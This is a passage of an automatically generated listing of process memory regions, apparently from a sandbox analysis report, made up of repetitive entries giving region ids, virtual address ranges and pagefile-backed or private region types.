region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18160 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18161 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18162 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18163 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18164 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18165 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18166 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18167 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18168 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18169 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18170 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18171 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18172 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18173 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18174 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18175 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18176 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18177 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18178 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 
18185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18341 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18342 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18343 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18344 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18345 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18346 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18347 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18348 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 18349 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18350 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18351 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18352 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18353 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18354 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18355 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18356 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18357 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18358 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18359 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18360 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18361 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18362 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18363 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18364 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18365 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18366 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18367 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18368 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18369 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18370 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18371 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18372 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18373 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18374 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18375 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18376 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18377 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18378 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18379 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18380 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18381 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18382 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18383 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18384 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18420 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18421 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18422 start_va = 0x2a0000 end_va 
= 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18423 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18424 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18425 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18426 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18427 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18428 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18429 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18430 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18431 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18432 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18433 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18434 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18435 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18436 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18437 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18438 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18439 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18440 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18441 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18442 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18443 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18444 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18445 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18446 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18447 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 18448 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18449 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18450 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18451 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18452 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18453 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18454 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18455 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18456 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18457 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18458 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18459 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18460 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18461 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18462 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18463 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18464 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18465 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18466 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18467 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18468 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18469 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18470 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18471 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18472 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18473 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18474 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18475 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18476 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18477 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18478 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18479 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18480 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18481 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18594 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18595 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18596 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18597 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 18598 start_va = 0x2a0000 end_va = 
0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18599 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18600 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18601 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18602 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18603 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18604 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18605 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18606 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18607 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18608 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18609 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18610 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18611 
start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18612 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18613 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18614 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18615 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18616 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18617 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18618 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18619 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18620 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18648 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18649 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18650 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 18651 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18652 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18653 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18654 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18655 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18656 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18657 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18658 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18659 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18660 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18661 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18662 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18663 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 18664 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18665 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18666 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18667 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18668 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18669 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18670 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18671 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18672 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 18673 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 18674 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 18675 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 18676 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = 
